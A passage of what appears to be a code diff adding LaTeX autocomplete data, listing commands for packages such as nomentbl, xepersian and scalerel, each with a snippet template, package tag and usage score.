'\\color{$1}', + meta: 'pgfarrows-cmd', + score: 0.2864294797053033, + }, + ], + 'pst-text': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-text-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-text-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-text-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-text-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-text-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-text-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-text-cmd', + score: 0.006520475264573554, + }, + ], + keystroke: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'keystroke-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'keystroke-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'keystroke-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'keystroke-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'keystroke-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'keystroke-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'keystroke-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'keystroke-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'keystroke-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'keystroke-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'keystroke-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'keystroke-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'keystroke-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'keystroke-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'keystroke-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'keystroke-cmd', + score: 0.004649150613625593, + }, + ], + currvita: [ + { + caption: '\\cvheadingfont', + snippet: '\\cvheadingfont', + meta: 'currvita-cmd', + score: 5.547871753177405e-5, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'currvita-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'currvita-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'currvita-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'currvita-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'currvita-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'currvita-cmd', + score: 0.0018957469739775527, + }, + ], + subfigmat: [ + { + caption: '\\subfigure[]{}', + snippet: '\\subfigure[$1]{$2}', + meta: 'subfigmat-cmd', + score: 0.037856842641104005, + }, + { + caption: '\\subref{}', + snippet: '\\subref{$1}', + meta: 'subfigmat-cmd', + score: 0.007192033516871399, + }, + { + caption: '\\subfigure[]{}', + snippet: '\\subfigure[$1]{$2}', + meta: 'subfigmat-cmd', + score: 0.037856842641104005, + }, + ], + boxhandler: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'boxhandler-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'boxhandler-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'boxhandler-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'boxhandler-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'boxhandler-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\pbox{}{}', + snippet: '\\pbox{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.0010883030320478486, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'boxhandler-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'boxhandler-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'boxhandler-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'boxhandler-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'boxhandler-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'boxhandler-cmd', + score: 0.028955796305270766, + }, + ], + media9: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'media9-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'media9-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'media9-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'media9-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'media9-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'media9-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'media9-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'media9-cmd', + score: 0.2864294797053033, + }, + ], + translator: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'translator-cmd', + score: 0.00037306820619479756, + }, + ], + german: [ + { + caption: '\\today', + snippet: '\\today', + meta: 'german-cmd', + score: 0.10733849317324783, + }, + ], + mhsetup: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'mhsetup-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'mhsetup-cmd', + score: 0.021170869458413965, + }, + ], + nomentbl: [ + { + caption: '\\nomenclature[]{}{}', + snippet: '\\nomenclature[$1]{$2}{$3}', + meta: 'nomentbl-cmd', + score: 0.016053526743355948, + }, + { + caption: '\\nomenclature{}{}', + snippet: '\\nomenclature{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.016053526743355948, + }, + { + caption: '\\nomlabel', + snippet: '\\nomlabel', + meta: 'nomentbl-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\printnomenclature', + snippet: '\\printnomenclature', + meta: 'nomentbl-cmd', + score: 0.0014526113324237952, + }, + { + caption: '\\printnomenclature[]', + snippet: '\\printnomenclature[$1]', + meta: 'nomentbl-cmd', + score: 0.0014526113324237952, + }, + { + caption: '\\makenomenclature', + snippet: '\\makenomenclature', + meta: 'nomentbl-cmd', + score: 0.002310610204652063, + }, + { + caption: '\\nomgroup', + snippet: '\\nomgroup', + meta: 'nomentbl-cmd', + score: 0.0005549290951493257, + }, + { + caption: '\\nomgroup[]{}', + snippet: '\\nomgroup[$1]{$2}', + meta: 'nomentbl-cmd', + score: 0.0005549290951493257, + }, + { + caption: '\\nomname', + snippet: '\\nomname', + meta: 'nomentbl-cmd', + score: 0.0015092617929470952, + }, + { + caption: '\\nompreamble', + snippet: '\\nompreamble', + meta: 'nomentbl-cmd', + score: 2.4350510995473236e-5, + }, + { + caption: '\\nomentryend', + snippet: '\\nomentryend', + meta: 'nomentbl-cmd', + score: 0.000137692304514793, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'nomentbl-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'nomentbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'nomentbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'nomentbl-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'nomentbl-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'nomentbl-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'nomentbl-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'nomentbl-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'nomentbl-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'nomentbl-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nomentbl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'nomentbl-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'nomentbl-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'nomentbl-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'nomentbl-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'nomentbl-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'nomentbl-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'nomentbl-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'nomentbl-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'nomentbl-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'nomentbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'nomentbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'nomentbl-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'nomentbl-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'nomentbl-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'nomentbl-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'nomentbl-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'nomentbl-cmd', + score: 0.0313525090421608, + }, + ], + miller: [ + { + caption: '\\hkl', + snippet: '\\hkl', + meta: 'miller-cmd', + score: 0.0034259481311452946, + }, + { + caption: '\\hkl{}', + snippet: '\\hkl{$1}', + meta: 'miller-cmd', + score: 0.0034259481311452946, + }, + { + caption: '\\hkl[]', + snippet: '\\hkl[$1]', + meta: 'miller-cmd', + score: 0.0034259481311452946, + }, + ], + lpform: [ + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'lpform-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'lpform-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'lpform-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'lpform-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'lpform-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'lpform-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'lpform-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'lpform-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'lpform-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'lpform-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'lpform-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'lpform-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'lpform-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'lpform-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'lpform-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'lpform-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'lpform-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'lpform-cmd', + score: 0.009331077109224957, + }, + ], + xepersian: [ + { + caption: '\\settextfont[]{}', + snippet: '\\settextfont[$1]{$2}', + meta: 'xepersian-cmd', + score: 0.00015447355412753335, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xepersian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xepersian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'xepersian-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'xepersian-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xepersian-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xepersian-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xepersian-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'xepersian-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'xepersian-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'xepersian-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xepersian-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xepersian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xepersian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xepersian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'xepersian-cmd', + score: 0.002958865219480927, + }, + ], + chapterbib: [ + { + caption: '\\bibliographystyle{}', + snippet: '\\bibliographystyle{$1}', + meta: 'chapterbib-cmd', + score: 0.25122317941387773, + }, + { + caption: '\\bibliography{}', + snippet: '\\bibliography{$1}', + meta: 'chapterbib-cmd', + score: 0.2659628337907604, + }, + { + caption: '\\include{}', + snippet: '\\include{$1}', + meta: 'chapterbib-cmd', + score: 0.1547080054979312, + }, + ], + scalerel: [ + { + caption: '\\scaleto{}{}', + snippet: '\\scaleto{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.00027615383978106523, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'scalerel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'scalerel-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'scalerel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'scalerel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'scalerel-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'scalerel-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'scalerel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'scalerel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'scalerel-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'scalerel-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'scalerel-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'scalerel-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'scalerel-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'scalerel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'scalerel-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'scalerel-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'scalerel-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'scalerel-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'scalerel-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'scalerel-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'scalerel-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'scalerel-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'scalerel-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'scalerel-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'scalerel-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'scalerel-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'scalerel-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'scalerel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'scalerel-cmd', + score: 0.004719094298848707, + }, + ], + extarrows: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'extarrows-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'extarrows-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'extarrows-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'extarrows-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'extarrows-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'extarrows-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'extarrows-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'extarrows-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'extarrows-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'extarrows-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'extarrows-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'extarrows-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'extarrows-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'extarrows-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'extarrows-cmd', + score: 0.006473769486518971, + }, + { + caption: 